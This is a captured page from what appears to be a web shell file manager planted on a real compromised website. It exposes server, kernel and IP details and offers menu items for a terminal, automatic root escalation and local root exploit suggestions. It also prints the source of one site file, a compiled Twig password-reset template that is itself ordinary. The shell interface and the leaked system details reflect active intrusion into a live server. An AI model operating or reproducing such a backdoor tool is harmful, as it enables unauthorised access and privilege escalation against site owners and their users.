Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
fa /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
fa744b5b7838fbebe94f0f3672f48968.php
12.24
KB
-rwxrwxr-x
2026-05-18 12:54
fafd13642cb1f10e1365bab71fb187b1.php
3.89
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @User/Custom/reset.success.html.twig */ class __TwigTemplate_fbd7efc6ca5f47439f8ecdd13d3dc545 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->blocks = [ 'page_header' => [$this, 'block_page_header'], 'page_header_around' => [$this, 'block_page_header_around'], 'container_div_start' => [$this, 'block_container_div_start'], 'container_class' => [$this, 'block_container_class'], 'content' => [$this, 'block_content'], 'flashes_content' => [$this, 'block_flashes_content'], 'footer_tag_start' => [$this, 'block_footer_tag_start'], 'footer' => [$this, 'block_footer'], 'footer_tag_end' => [$this, 'block_footer_tag_end'], ]; } protected function doGetParent(array $context): bool|string|Template|TemplateWrapper { // line 1 return "base.html.twig"; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; $this->parent = $this->load("base.html.twig", 1); yield from $this->parent->unwrap()->yield($context, array_merge($this->blocks, $blocks)); } // line 3 /** * @return iterable<null|scalar|\Stringable> */ public function block_page_header(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } // line 4 /** * @return iterable<null|scalar|\Stringable> */ public function block_page_header_around(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } // line 5 /** * @return iterable<null|scalar|\Stringable> */ public function block_container_div_start(array $context, array $blocks = []): iterable { $macros = $this->macros; yield "<div class=\""; yield from $this->unwrap()->yieldBlock('container_class', $context, $blocks); yield "\">"; yield from []; } /** * @return iterable<null|scalar|\Stringable> */ public function block_container_class(array $context, array $blocks = []): iterable { $macros = $this->macros; yield "container container-custom container-reset"; yield from []; } // line 7 /** * @return iterable<null|scalar|\Stringable> */ public function block_content(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 8 yield " "; // line 9 yield from $this->unwrap()->yieldBlock('flashes_content', $context, $blocks); // line 12 yield " <div class=\"row-fluid\"> <form class=\"well well-login\" action=\""; // line 15 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath("iga_user_reset_pw", ["cultureString" => CoreExtension::getAttribute($this->env, $this->source, ($context["userLanguage"] ?? null), "cultureString", [], "any", false, false, false, 15), "token" => ($context["token"] ?? null)]), "html", null, true); yield "\" method=\"POST\"> <div class=\"row text-center\"> <img src=\""; // line 18 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['Symfony\Bridge\Twig\Extension\AssetExtension']->getAssetUrl("images/logo.png"), "html", null, true); yield "\" class=\"login-logo\" alt=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Place Ads on Digital Billboards"), "html", null, true); yield "\" /> <h3 style=\"padding-top: 18px; padding-bottom: 24px;\" class=\"text-white\">Please choose your new password</h3> </div> <div class=\"form-group row\"> <div class=\"col-sm-12 formPrompt\"> "; // line 24 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "password", [], "any", false, false, false, 24), "password", [], "any", false, false, false, 24), 'widget'); yield " <p class=\"clearfix\"> <span class=\"formError\">"; // line 26 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "password", [], "any", false, false, false, 26), "password", [], "any", false, false, false, 26), 'errors'); yield "</span> </p> <span class=\"help-block text-info text-white\"> "; // line 29 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Your password must contain at least one upper case character, at least one lower case character, at least one number and must be six characters or more in length."), "html", null, true); yield " </span> </div> </div> <div class=\"form-group row\"> <div class=\"col-sm-12 formPrompt\"> "; // line 36 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "password", [], "any", false, false, false, 36), "confirm", [], "any", false, false, false, 36), 'widget'); yield " <p class=\"clearfix\"> <span class=\"formError\">"; // line 38 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "password", [], "any", false, false, false, 38), "confirm", [], "any", false, false, false, 38), 'errors'); yield "</span> </p> </div> </div> "; // line 43 if ((($context["token"] ?? null) == "sms")) { // line 44 yield " <div class=\"form-group row\"> <div class=\"col-lg-3 col-sm-12 formLabel\"> "; // line 47 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "reset_code", [], "any", false, false, false, 47), 'label'); yield " </div> <div class=\"col-sm-12 formPrompt\"> "; // line 50 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "reset_code", [], "any", false, false, false, 50), 'widget'); yield " <p class=\"clearfix\"> <span class=\"formError\">"; // line 52 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "reset_code", [], "any", false, false, false, 52), 'errors'); yield "</span> </p> </div> </div> "; } // line 58 yield " <div class=\"form-group row\"> <div class=\"col-sm-12 formPrompt text-white text-center\"> "; // line 61 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "captcha", [], "any", false, false, false, 61), 'widget'); yield " <p class=\"clearfix\"> <span class=\"formError\">"; // line 63 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "captcha", [], "any", false, false, false, 63), 'errors'); yield "</span> </p> </div> </div> <div class=\"row form-actions formActions\"> <button type=\"submit\" class=\"btn btn-primary\">"; // line 69 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($this->extensions['App\CoreBundle\Twig\CoreExtension']->getPhrase("Reset"), "html", null, true); yield "</button> </div> "; // line 72 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'rest'); yield " </form> </div> "; yield from []; } // line 9 /** * @return iterable<null|scalar|\Stringable> */ public function block_flashes_content(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 10 yield " "; yield from $this->yieldParentBlock("flashes_content", $context, $blocks); yield " "; yield from []; } // line 79 /** * @return iterable<null|scalar|\Stringable> */ public function block_footer_tag_start(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 80 yield " "; yield from []; } // line 82 /** * @return iterable<null|scalar|\Stringable> */ public function block_footer(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } // line 84 /** * @return iterable<null|scalar|\Stringable> */ public function block_footer_tag_end(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 85 yield " "; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@User/Custom/reset.success.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 277 => 85, 270 => 84, 260 => 82, 255 => 80, 248 => 79, 240 => 10, 233 => 9, 222 => 72, 216 => 69, 207 => 63, 202 => 61, 197 => 58, 188 => 52, 183 => 50, 177 => 47, 172 => 44, 170 => 43, 162 => 38, 157 => 36, 147 => 29, 141 => 26, 136 => 24, 125 => 18, 119 => 15, 114 => 12, 112 => 9, 109 => 8, 102 => 7, 79 => 5, 69 => 4, 59 => 3, 48 => 1,); } public function getSourceContext(): Source { return new Source("", "@User/Custom/reset.success.html.twig", "/var/www/v3.cesa.co.za/src/UserBundle/Resources/views/Custom/reset.success.html.twig"); } }